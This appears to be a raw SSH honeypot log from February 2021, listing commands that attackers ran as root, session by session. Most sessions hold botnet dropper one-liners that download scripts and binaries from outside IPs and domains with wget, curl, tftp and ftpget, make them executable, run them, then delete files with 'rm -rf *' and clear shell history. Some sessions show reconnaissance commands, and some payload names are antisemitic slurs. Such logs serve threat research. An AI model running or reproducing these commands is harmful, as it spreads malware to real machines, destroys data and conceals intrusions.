ftpget -v -u anonymous -p anonymous -P 21 51.75.190.159 .sh .sh
sh .sh
rm -rf sh bins.sh .sh .sh
rm -rf *

From 95.19.252.139 7-Feb-2021 18:07:56 ssh2 root
ps -a
nproc
cat etc/issue
cat /etc/issue
wget
cd .ssh
ls -a
wget heya.at.ua/new/gs.tgz
wget http://rekon.altervista.org/irc/bnc.tgz
exit

From 174.138.12.229 7-Feb-2021 19:13:19 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.239.147.105/incubusdream.sh; chmod 777 incubusdream.sh; sh incubusdream.sh; tftp 193.239.147.105 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 193.239.147.105; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://193.239.147.105/incubusdream.sh
chmod 777 incubusdream.sh
sh incubusdream.sh
tftp 193.239.147.105 -c get tftp1.sh
chmod 777 tftp1.sh
sh tftp1.sh
tftp -r tftp2.sh -g 193.239.147.105
chmod 777 tftp2.sh
sh tftp2.sh
rm -rf *

From 146.255.75.178 8-Feb-2021 01:06:08 ssh2 root
w
cd /home
ls
ps x
ls
nporc
lscpu
cd /tmp
cd .ssh
ls
ls -a
cd .prgssh3
ls
exit

From 206.189.58.182 8-Feb-2021 06:18:26 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://163.172.234.205/sh; curl -O http://163.172.234.205/sh; chmod 777 sh; sh sh; tftp 163.172.234.205 -c get bins.sh; chmod 777 bins.sh; sh bins.sh; tftp -r .sh -g 163.172.234.205; chmod 777 .sh; sh .sh; ftpget -v -u anonymous -p anonymous -P 21 163.172.234.205 .sh .sh; sh .sh; rm -rf sh bins.sh .sh .sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://163.172.234.205/sh
curl -O http://163.172.234.205/sh
chmod 777 sh
sh sh
tftp 163.172.234.205 -c get bins.sh
chmod 777 bins.sh
sh bins.sh
tftp -r .sh -g 163.172.234.205
chmod 777 .sh
sh .sh
ftpget -v -u anonymous -p anonymous -P 21 163.172.234.205 .sh .sh
sh .sh
rm -rf sh bins.sh .sh .sh
rm -rf *

From 95.19.252.139 8-Feb-2021 13:34:40 ssh2 root
ls
./test.pl
ps -x
cd /home
ls
ls -a
ls
exit

From 128.199.203.183 8-Feb-2021 18:09:23 ssh2 root
Exec uname -a 
uname -a

From 64.225.105.68 8-Feb-2021 20:41:11 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://163.172.234.199/fuckjewishpeople.sh; chmod 777 fuckjewishpeople.sh; sh fuckjewishpeople.sh; tftp 163.172.234.199 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 163.172.234.199; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://163.172.234.199/fuckjewishpeople.sh
chmod 777 fuckjewishpeople.sh
sh fuckjewishpeople.sh
tftp 163.172.234.199 -c get tftp1.sh
chmod 777 tftp1.sh
sh tftp1.sh
tftp -r tftp2.sh -g 163.172.234.199
chmod 777 tftp2.sh
sh tftp2.sh
rm -rf *

From 142.44.214.91 9-Feb-2021 04:34:34 ssh2 root
Exec uname -a;cd /tmp;dget http://mexalz.cf/xshieldd ;wget http://mexalz.cf/xshieldd;fetch http://mexalz.cf/xshieldd;curl -O http://mexalz.cf/xshieldd && perl xshieldd && rm -rf xshield*
uname -a
cd /tmp
dget http://mexalz.cf/xshieldd
wget http://mexalz.cf/xshieldd
fetch http://mexalz.cf/xshieldd
curl -O http://mexalz.cf/xshieldd
perl xshieldd
rm -rf xshield*

From 163.172.234.215 9-Feb-2021 12:21:49 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://163.172.234.212/sh; curl -O http://163.172.234.212/sh; chmod 777 sh; sh sh; tftp 163.172.234.212 -c get bins.sh; chmod 777 bins.sh; sh bins.sh; tftp -r .sh -g 163.172.234.212; chmod 777 .sh; sh .sh; ftpget -v -u anonymous -p anonymous -P 21 163.172.234.212 .sh .sh; sh .sh; rm -rf sh bins.sh .sh .sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://163.172.234.212/sh
curl -O http://163.172.234.212/sh
chmod 777 sh
sh sh
tftp 163.172.234.212 -c get bins.sh
chmod 777 bins.sh
sh bins.sh
tftp -r .sh -g 163.172.234.212
chmod 777 .sh
sh .sh
ftpget -v -u anonymous -p anonymous -P 21 163.172.234.212 .sh .sh
sh .sh
rm -rf sh bins.sh .sh .sh
rm -rf *

From 159.203.190.66 9-Feb-2021 18:19:36 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://159.65.222.61/sh; curl -O http://159.65.222.61/sh; chmod 777 sh; sh sh; tftp 159.65.222.61 -c get bins.sh; chmod 777 bins.sh; sh bins.sh; tftp -r .sh -g 159.65.222.61; chmod 777 .sh; sh .sh; ftpget -v -u anonymous -p anonymous -P 21 159.65.222.61 .sh .sh; sh .sh; rm -rf sh bins.sh .sh .sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://159.65.222.61/sh
curl -O http://159.65.222.61/sh
chmod 777 sh
sh sh
tftp 159.65.222.61 -c get bins.sh
chmod 777 bins.sh
sh bins.sh
tftp -r .sh -g 159.65.222.61
chmod 777 .sh
sh .sh
ftpget -v -u anonymous -p anonymous -P 21 159.65.222.61 .sh .sh
sh .sh
rm -rf sh bins.sh .sh .sh
rm -rf *

From 167.99.32.203 10-Feb-2021 07:15:31 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.239.243.27/projectdream.sh; chmod 777 projectdream.sh; sh projectdream.sh; tftp 185.239.243.27 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 185.239.243.27; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://185.239.243.27/projectdream.sh
chmod 777 projectdream.sh
sh projectdream.sh
tftp 185.239.243.27 -c get tftp1.sh
chmod 777 tftp1.sh
sh tftp1.sh
tftp -r tftp2.sh -g 185.239.243.27
chmod 777 tftp2.sh
sh tftp2.sh
rm -rf *

From 45.89.124.122 10-Feb-2021 19:57:33 ssh2 root
Exec wget http://107.174.217.134/bins/Simps.x86_64;chmod 777 Simps.x86_64;./Simps.x86_64
wget http://107.174.217.134/bins/Simps.x86_64
chmod 777 Simps.x86_64
./Simps.x86_64

From 40.74.139.130 10-Feb-2021 20:28:51 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://104.41.24.30/bins.sh; chmod +x bins.sh; sh bins.sh; tftp 104.41.24.30 -c get tftp1.sh; chmod +x tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 104.41.24.30; chmod +x tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 104.41.24.30 ftp1.sh ftp1.sh; sh ftp1.sh tftp1.sh tftp2.sh ftp1.sh
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://104.41.24.30/bins.sh
chmod +x bins.sh
sh bins.sh
tftp 104.41.24.30 -c get tftp1.sh
chmod +x tftp1.sh
sh tftp1.sh
tftp -r tftp2.sh -g 104.41.24.30
chmod +x tftp2.sh
sh tftp2.sh
ftpget -v -u anonymous -p anonymous -P 21 104.41.24.30 ftp1.sh ftp1.sh
sh ftp1.sh tftp1.sh tftp2.sh ftp1.sh

From 37.46.150.142 10-Feb-2021 23:05:10 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.239.147.190/shell; chmod 777 shell; sh shell; tftp 193.239.147.190 -c get tftp; chmod 777 tftp; sh tftp; tftp -r tftp -g 193.239.147.190; chmod 777 tftp; sh tftp; rm -rf shell tftp; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://193.239.147.190/shell
chmod 777 shell
sh shell
tftp 193.239.147.190 -c get tftp
chmod 777 tftp
sh tftp
tftp -r tftp -g 193.239.147.190
chmod 777 tftp
sh tftp
rm -rf shell tftp
rm -rf *

From 175.27.187.38 11-Feb-2021 04:52:04 ssh2 root
Exec cat /proc/uptime
cat /proc/uptime
Exec cat /proc/uptime
cat /proc/uptime
Exec cat /proc/uptime
cat /proc/uptime
Exec cat /proc/uptime
cat /proc/uptime
Exec cat /proc/uptime
Exec cat /proc/uptime
cat /proc/uptime
cat /proc/uptime

From 144.126.222.106 12-Feb-2021 05:33:58 ssh2 root
Exec cat /etc/issue ; wget http://143.110.156.240/x86;cat x86 >fairyfuck;chmod 777 *;./fairyfuck;history -c
cat /etc/issue
wget http://143.110.156.240/x86
cat x86 >fairyfuck
chmod 777 *
./fairyfuck
history -c

From 188.166.87.163 12-Feb-2021 18:18:32 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.130.138.70/sh; curl -O http://45.130.138.70/sh; chmod 777 sh; sh sh; tftp 45.130.138.70 -c get bins.sh; chmod 777 bins.sh; sh bins.sh; tftp -r .sh -g 45.130.138.70; chmod 777 .sh; sh .sh; ftpget -v -u anonymous -p anonymous -P 21 45.130.138.70 .sh .sh; sh .sh; rm -rf sh bins.sh .sh .sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://45.130.138.70/sh
curl -O http://45.130.138.70/sh
chmod 777 sh
sh sh
tftp 45.130.138.70 -c get bins.sh
chmod 777 bins.sh
sh bins.sh
tftp -r .sh -g 45.130.138.70
chmod 777 .sh
sh .sh
ftpget -v -u anonymous -p anonymous -P 21 45.130.138.70 .sh .sh
sh .sh
rm -rf sh bins.sh .sh .sh
rm -rf *

From 188.166.87.163 13-Feb-2021 04:57:52 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.130.138.67/sh; curl -O http://45.130.138.67/sh; chmod 777 sh; sh sh; tftp 45.130.138.67 -c get bins.sh; chmod 777 bins.sh; sh bins.sh; tftp -r .sh -g 45.130.138.67; chmod 777 .sh; sh .sh; ftpget -v -u anonymous -p anonymous -P 21 45.130.138.67 .sh .sh; sh .sh; rm -rf sh bins.sh .sh .sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://45.130.138.67/sh
curl -O http://45.130.138.67/sh
chmod 777 sh
sh sh
tftp 45.130.138.67 -c get bins.sh
chmod 777 bins.sh
sh bins.sh
tftp -r .sh -g 45.130.138.67
chmod 777 .sh
sh .sh
ftpget -v -u anonymous -p anonymous -P 21 45.130.138.67 .sh .sh
sh .sh
rm -rf sh bins.sh .sh .sh
rm -rf *

From 45.145.185.222 13-Feb-2021 17:22:22 ssh2 root
Exec lscpu ; nproc ; wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo
lscpu
nproc
wget nasapaul.com/ninfo
chmod +x *
./ninfo

From 51.161.31.150 14-Feb-2021 08:32:33 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://venus.lol/Pemex.sh; curl -O http://venus.lol/Pemex.sh; chmod 777 Pemex.sh; sh Pemex.sh; tftp venus.lol -c get Pemex.sh; chmod 777 Pemex.sh; sh Pemex.sh; tftp -r Pemex2.sh -g venus.lol; chmod 777 Pemex2.sh; sh Pemex2.sh; ftpget -v -u anonymous -p anonymous -P 21 venus.lol Pemex1.sh Pemex1.sh; sh Pemex1.sh; rm -rf Pemex.sh Pemex.sh Pemex2.sh Pemex1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://venus.lol/Pemex.sh
curl -O http://venus.lol/Pemex.sh
chmod 777 Pemex.sh
sh Pemex.sh
tftp venus.lol -c get Pemex.sh
chmod 777 Pemex.sh
sh Pemex.sh
tftp -r Pemex2.sh -g venus.lol
chmod 777 Pemex2.sh
sh Pemex2.sh
ftpget -v -u anonymous -p anonymous -P 21 venus.lol Pemex1.sh Pemex1.sh
sh Pemex1.sh
rm -rf Pemex.sh Pemex.sh Pemex2.sh Pemex1.sh
rm -rf *

From 167.99.32.92 14-Feb-2021 14:02:30 ssh2 root
Exec lscpu ; nproc ; wget nasapaul.com/ninfo ; chmod +x * ; ./ninfo ; rm -rf *
lscpu
nproc
wget nasapaul.com/ninfo
chmod +x *
./ninfo
rm -rf *

From 207.154.245.175 14-Feb-2021 18:59:28 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.130.138.67/oniondream.sh; chmod 777 oniondream.sh; sh oniondream.sh; tftp 45.130.138.67 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 45.130.138.67; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://45.130.138.67/oniondream.sh
chmod 777 oniondream.sh
sh oniondream.sh
tftp 45.130.138.67 -c get tftp1.sh
chmod 777 tftp1.sh
sh tftp1.sh
tftp -r tftp2.sh -g 45.130.138.67
chmod 777 tftp2.sh
sh tftp2.sh
rm -rf *

From 77.83.247.58 14-Feb-2021 23:18:13 ssh2 root
Exec cd /tmp  cd /var/run  cd /mnt  cd /root  cd /; wget http://45.141.59.213/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 45.141.59.213 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 45.141.59.213; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf *
cd /tmp cd /var/run cd /mnt cd /root cd /
wget http://45.141.59.213/bins.sh
chmod 777 bins.sh
sh bins.sh
tftp 45.141.59.213 -c get tftp1.sh
chmod 777 tftp1.sh
sh tftp1.sh
tftp -r tftp2.sh -g 45.141.59.213
chmod 777 tftp2.sh
sh tftp2.sh
rm -rf *

From 185.117.119.235 15-Feb-2021 17:54:25 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.145.185.100/LpKDJb/pxSd.x86;curl -O http://45.145.185.100/LpKDJb/pxSd.x86; chmod 777 pxSd.x86; ./pxSd.x86 x86_64; tftp 45.145.185.100 -c get pxSd.x86; chmod 777 pxSd.x86; ./pxSd.x86 x86_64; tftp -r pxSd.x86 -g 45.145.185.100; chmod 777 pxSd.x86; ./pxSd.x86 x86_64; ftpget -v -u anonymous -p anonymous -P 21 45.145.185.100 pxSd.x86 pxSd.x86; ./pxSd.x86 x86_64; rm -rf pxSd.x86
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://45.145.185.100/LpKDJb/pxSd.x86
curl -O http://45.145.185.100/LpKDJb/pxSd.x86
chmod 777 pxSd.x86
./pxSd.x86 x86_64
tftp 45.145.185.100 -c get pxSd.x86
chmod 777 pxSd.x86
./pxSd.x86 x86_64
tftp -r pxSd.x86 -g 45.145.185.100
chmod 777 pxSd.x86
./pxSd.x86 x86_64
ftpget -v -u anonymous -p anonymous -P 21 45.145.185.100 pxSd.x86 pxSd.x86
./pxSd.x86 x86_64
rm -rf pxSd.x86
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.145.185.100/LpKDJb/pxSd.x86;curl -O http://45.145.185.100/LpKDJb/pxSd.x86; chmod 777 pxSd.x86; ./pxSd.x86 x86_64; tftp 45.145.185.100 -c get pxSd.x86; chmod 777 pxSd.x86; ./pxSd.x86 x86_64; tftp -r pxSd.x86 -g 45.145.185.100; chmod 777 pxSd.x86; ./pxSd.x86 x86_64; ftpget -v -u anonymous -p anonymous -P 21 45.145.185.100 pxSd.x86 pxSd.x86; ./pxSd.x86 x86_64; rm -rf pxSd.x86
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://45.145.185.100/LpKDJb/pxSd.x86
curl -O http://45.145.185.100/LpKDJb/pxSd.x86
chmod 777 pxSd.x86
./pxSd.x86 x86_64
tftp 45.145.185.100 -c get pxSd.x86
chmod 777 pxSd.x86
./pxSd.x86 x86_64
tftp -r pxSd.x86 -g 45.145.185.100
chmod 777 pxSd.x86
./pxSd.x86 x86_64
ftpget -v -u anonymous -p anonymous -P 21 45.145.185.100 pxSd.x86 pxSd.x86
./pxSd.x86 x86_64
rm -rf pxSd.x86

From 185.117.119.235 15-Feb-2021 18:04:14 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.145.185.100/LpKDJb/pxSd.x86;curl -O http://45.145.185.100/LpKDJb/pxSd.x86; chmod 777 pxSd.x86; ./pxSd.x86 x86_64; tftp 45.145.185.100 -c get pxSd.x86; chmod 777 pxSd.x86; ./pxSd.x86 x86_64; tftp -r pxSd.x86 -g 45.145.185.100; chmod 777 pxSd.x86; ./pxSd.x86 x86_64; ftpget -v -u anonymous -p anonymous -P 21 45.145.185.100 pxSd.x86 pxSd.x86; ./pxSd.x86 x86_64; rm -rf pxSd.x86
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://45.145.185.100/LpKDJb/pxSd.x86
curl -O http://45.145.185.100/LpKDJb/pxSd.x86
chmod 777 pxSd.x86
./pxSd.x86 x86_64
tftp 45.145.185.100 -c get pxSd.x86
chmod 777 pxSd.x86
./pxSd.x86 x86_64
tftp -r pxSd.x86 -g 45.145.185.100
chmod 777 pxSd.x86
./pxSd.x86 x86_64
ftpget -v -u anonymous -p anonymous -P 21 45.145.185.100 pxSd.x86 pxSd.x86
./pxSd.x86 x86_64
rm -rf pxSd.x86

From 152.89.239.71 15-Feb-2021 19:57:31 ssh2 root
Exec curl -s -O http://45.84.196.157/pi && perl pi && rm -rf pi
curl -s -O http://45.84.196.157/pi
perl pi
rm -rf pi

From 119.196.147.88 16-Feb-2021 14:36:36 ssh2 root
Exec echo "{
  \"info\":\"$(uname -a 2>/dev/null)\",
  \"os\":\"$(lsb_release -ds 2>/dev/null)\",
  \"machine\":\"$(uname -m 2>/dev/null)\",
  \"curl\":\"$(which curl 2>/dev/null)\",
  \"wget\":\"$(which wget 2>/dev/null)\",
  \"adb\":\"$(which adb 2>/dev/null)\",
  \"iptables\":\"$(which iptables 2>/dev/null)\",
  \"ipset\":\"$(which ipset 2>/dev/null)\"
}"
echo "{ \"info\":\"$(uname -a 2>/dev/null)\", \"os\":\"$(lsb_release -ds 2>/dev/null)\", \"machine\":\"$(uname -m 2>/dev/null)\", \"curl\":\"$(which curl 2>/dev/null)\", \"wget\":\"$(which wget 2>/dev/null)\", \"adb\":\"$(which adb 2>/dev/null)\", \"iptables\":\"$(which iptables 2>/dev/null)\", \"ipset\":\"$(which ipset 2>/dev/null)\" }"
Exec echo "{
  \"info\":\"$(uname -a 2>/dev/null)\",
  \"os\":\"$(lsb_release -ds 2>/dev/null)\",
  \"machine\":\"$(uname -m 2>/dev/null)\",
  \"curl\":\"$(which curl 2>/dev/null)\",
  \"wget\":\"$(which wget 2>/dev/null)\",
  \"adb\":\"$(which adb 2>/dev/null)\",
  \"iptables\":\"$(which iptables 2>/dev/null)\",
  \"ipset\":\"$(which ipset 2>/dev/null)\"
}"
echo "{ \"info\":\"$(uname -a 2>/dev/null)\", \"os\":\"$(lsb_release -ds 2>/dev/null)\", \"machine\":\"$(uname -m 2>/dev/null)\", \"curl\":\"$(which curl 2>/dev/null)\", \"wget\":\"$(which wget 2>/dev/null)\", \"adb\":\"$(which adb 2>/dev/null)\", \"iptables\":\"$(which iptables 2>/dev/null)\", \"ipset\":\"$(which ipset 2>/dev/null)\" }"
Exec echo "{
  \"info\":\"$(uname -a 2>/dev/null)\",
  \"os\":\"$(lsb_release -ds 2>/dev/null)\",
  \"machine\":\"$(uname -m 2>/dev/null)\",
  \"curl\":\"$(which curl 2>/dev/null)\",
  \"wget\":\"$(which wget 2>/dev/null)\",
  \"adb\":\"$(which adb 2>/dev/null)\",
  \"iptables\":\"$(which iptables 2>/dev/null)\",
  \"ipset\":\"$(which ipset 2>/dev/null)\"
}"
echo "{ \"info\":\"$(uname -a 2>/dev/null)\", \"os\":\"$(lsb_release -ds 2>/dev/null)\", \"machine\":\"$(uname -m 2>/dev/null)\", \"curl\":\"$(which curl 2>/dev/null)\", \"wget\":\"$(which wget 2>/dev/null)\", \"adb\":\"$(which adb 2>/dev/null)\", \"iptables\":\"$(which iptables 2>/dev/null)\", \"ipset\":\"$(which ipset 2>/dev/null)\" }"

From 14.46.7.72 16-Feb-2021 19:57:29 ssh2 root
Exec echo "{
  \"info\":\"$(uname -a 2>/dev/null)\",
  \"os\":\"$(lsb_release -ds 2>/dev/null)\",
  \"machine\":\"$(uname -m 2>/dev/null)\",
  \"curl\":\"$(which curl 2>/dev/null)\",
  \"wget\":\"$(which wget 2>/dev/null)\",
  \"adb\":\"$(which adb 2>/dev/null)\",
  \"iptables\":\"$(which iptables 2>/dev/null)\",
  \"ipset\":\"$(which ipset 2>/dev/null)\"
}"
echo "{ \"info\":\"$(uname -a 2>/dev/null)\", \"os\":\"$(lsb_release -ds 2>/dev/null)\", \"machine\":\"$(uname -m 2>/dev/null)\", \"curl\":\"$(which curl 2>/dev/null)\", \"wget\":\"$(which wget 2>/dev/null)\", \"adb\":\"$(which adb 2>/dev/null)\", \"iptables\":\"$(which iptables 2>/dev/null)\", \"ipset\":\"$(which ipset 2>/dev/null)\" }"
Exec echo "{
  \"info\":\"$(uname -a 2>/dev/null)\",
  \"os\":\"$(lsb_release -ds 2>/dev/null)\",
  \"machine\":\"$(uname -m 2>/dev/null)\",
  \"curl\":\"$(which curl 2>/dev/null)\",
  \"wget\":\"$(which wget 2>/dev/null)\",
  \"adb\":\"$(which adb 2>/dev/null)\",
  \"iptables\":\"$(which iptables 2>/dev/null)\",
  \"ipset\":\"$(which ipset 2>/dev/null)\"
}"
echo "{ \"info\":\"$(uname -a 2>/dev/null)\", \"os\":\"$(lsb_release -ds 2>/dev/null)\", \"machine\":\"$(uname -m 2>/dev/null)\", \"curl\":\"$(which curl 2>/dev/null)\", \"wget\":\"$(which wget 2>/dev/null)\", \"adb\":\"$(which adb 2>/dev/null)\", \"iptables\":\"$(which iptables 2>/dev/null)\", \"ipset\":\"$(which ipset 2>/dev/null)\" }"

From 191.16.95.231 16-Feb-2021 19:57:53 ssh2 root
Exec echo "{
  \"info\":\"$(uname -a 2>/dev/null)\",
  \"os\":\"$(lsb_release -ds 2>/dev/null)\",
  \"machine\":\"$(uname -m 2>/dev/null)\",
  \"curl\":\"$(which curl 2>/dev/null)\",
  \"wget\":\"$(which wget 2>/dev/null)\",
  \"adb\":\"$(which adb 2>/dev/null)\",
  \"iptables\":\"$(which iptables 2>/dev/null)\",
  \"ipset\":\"$(which ipset 2>/dev/null)\"
}"
echo "{ \"info\":\"$(uname -a 2>/dev/null)\", \"os\":\"$(lsb_release -ds 2>/dev/null)\", \"machine\":\"$(uname -m 2>/dev/null)\", \"curl\":\"$(which curl 2>/dev/null)\", \"wget\":\"$(which wget 2>/dev/null)\", \"adb\":\"$(which adb 2>/dev/null)\", \"iptables\":\"$(which iptables 2>/dev/null)\", \"ipset\":\"$(which ipset 2>/dev/null)\" }"

From 45.95.169.237 17-Feb-2021 21:22:58 ssh2 root
Exec cd /tmp; wget http://194.62.6.48/ssh.sh; curl -O http://194.62.6.48/ssh.sh; chmod 777 ssh.sh; sh ssh.sh; tftp 194.62.6.48 -c get ssh1.sh; chmod 777 ssh1.sh; sh ssh1.sh; tftp -r ssh2.sh -g 194.62.6.48; chmod 777 ssh2.sh; sh ssh2.sh; rm -rf ssh.sh ssh1.sh ssh2.sh
cd /tmp
wget http://194.62.6.48/ssh.sh
curl -O http://194.62.6.48/ssh.sh
chmod 777 ssh.sh
sh ssh.sh
tftp 194.62.6.48 -c get ssh1.sh
chmod 777 ssh1.sh
sh ssh1.sh
tftp -r ssh2.sh -g 194.62.6.48
chmod 777 ssh2.sh
sh ssh2.sh
rm -rf ssh.sh ssh1.sh ssh2.sh

From 51.161.31.150 17-Feb-2021 22:19:35 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://51.161.31.150/huh.sh; curl -O http://51.161.31.150/huh.sh; chmod 777 huh.sh; sh huh.sh; tftp 51.161.31.150 -c get huh.sh; chmod 777 huh.sh; sh huh.sh; tftp -r huh2.sh -g 51.161.31.150; chmod 777 huh2.sh; sh huh2.sh; ftpget -v -u anonymous -p anonymous -P 21 51.161.31.150 huh1.sh huh1.sh; sh huh1.sh; rm -rf huh.sh huh.sh huh2.sh huh1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://51.161.31.150/huh.sh
curl -O http://51.161.31.150/huh.sh
chmod 777 huh.sh
sh huh.sh
tftp 51.161.31.150 -c get huh.sh
chmod 777 huh.sh
sh huh.sh
tftp -r huh2.sh -g 51.161.31.150
chmod 777 huh2.sh
sh huh2.sh
ftpget -v -u anonymous -p anonymous -P 21 51.161.31.150 huh1.sh huh1.sh
sh huh1.sh
rm -rf huh.sh huh.sh huh2.sh huh1.sh
rm -rf *

From 199.223.254.107 18-Feb-2021 04:25:23 ssh2 root
Exec cd /tmp || cd /run || cd /; wget http://45.15.143.152/xxxbins.sh; chmod 777 xxxbins.sh; sh xxxbins.sh; tftp 45.15.143.152 -c get xxxtftp1.sh; chmod 777 xxxtftp1.sh; sh xxxtftp1.sh; tftp -r xxxtftp2.sh -g 45.15.143.152; chmod 777 xxxtftp2.sh; sh xxxtftp2.sh; rm -rf xxxbins.sh xxxtftp1.sh xxxtftp2.sh; rm -rf *
cd /tmp || cd /run || cd /
wget http://45.15.143.152/xxxbins.sh
chmod 777 xxxbins.sh
sh xxxbins.sh
tftp 45.15.143.152 -c get xxxtftp1.sh
chmod 777 xxxtftp1.sh
sh xxxtftp1.sh
tftp -r xxxtftp2.sh -g 45.15.143.152
chmod 777 xxxtftp2.sh
sh xxxtftp2.sh
rm -rf xxxbins.sh xxxtftp1.sh xxxtftp2.sh
rm -rf *

From 207.154.223.53 18-Feb-2021 08:33:22 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://195.58.38.73/GoOgle.sh; chmod 777 GoOgle.sh; sh GoOgle.sh; tftp 195.58.38.73 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 195.58.38.73; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 195.58.38.73 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf GoOgle.sh tftp1.sh tftp2.sh ftp1.sh;rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://195.58.38.73/GoOgle.sh
chmod 777 GoOgle.sh
sh GoOgle.sh
tftp 195.58.38.73 -c get tftp1.sh
chmod 777 tftp1.sh
sh tftp1.sh
tftp -r tftp2.sh -g 195.58.38.73
chmod 777 tftp2.sh
sh tftp2.sh
ftpget -v -u anonymous -p anonymous -P 21 195.58.38.73 ftp1.sh ftp1.sh
sh ftp1.sh
rm -rf GoOgle.sh tftp1.sh tftp2.sh ftp1.sh
rm -rf *

From 211.159.154.136 18-Feb-2021 23:04:50 ssh2 root
Exec nproc;uname -a
nproc
uname -a
Exec nproc;uname -a
nproc
uname -a

From 161.97.112.251 22-Feb-2021 18:22:20 ssh2 root
Exec wget http://209.141.48.55/x86; curl -O http://209.141.48.55/x86; cat x86 > 0x3a13a141f0c; chmod +x *; ./0x3a13a141f0c Exploit.x86
wget http://209.141.48.55/x86
curl -O http://209.141.48.55/x86
cat x86 > 0x3a13a141f0c
chmod +x *
./0x3a13a141f0c Exploit.x86

From 161.35.218.118 23-Feb-2021 00:56:44 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.151.68.222/incubusdream.sh; chmod 777 incubusdream.sh; sh incubusdream.sh; tftp 45.151.68.222 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 45.151.68.222; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf * 

cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://45.151.68.222/incubusdream.sh
chmod 777 incubusdream.sh
sh incubusdream.sh
tftp 45.151.68.222 -c get tftp1.sh
chmod 777 tftp1.sh
sh tftp1.sh
tftp -r tftp2.sh -g 45.151.68.222
chmod 777 tftp2.sh
sh tftp2.sh
rm -rf *

From 143.110.250.79 24-Feb-2021 02:46:07 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://104.168.46.11/Sakura.sh; chmod 777 *; sh Sakura.sh; tftp -g 104.168.46.11 -r tftp1.sh; chmod 777 *; sh tftp1.sh; rm -rf *.sh; history -c
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://104.168.46.11/Sakura.sh
chmod 777 *
sh Sakura.sh
tftp -g 104.168.46.11 -r tftp1.sh
chmod 777 *
sh tftp1.sh
rm -rf *.sh
history -c

From 87.233.82.53 24-Feb-2021 10:16:22 ssh2 root
Exec cat /etc/issue
cat /etc/issue
Exec cat /etc/issue
cat /etc/issue

From 40.124.40.216 24-Feb-2021 20:54:51 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://51.11.244.208/fuckjewishpeople.sh; chmod 777 fuckjewishpeople.sh; sh fuckjewishpeople.sh; tftp 51.11.244.208 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 51.11.244.208; chmod 777 tftp2.sh
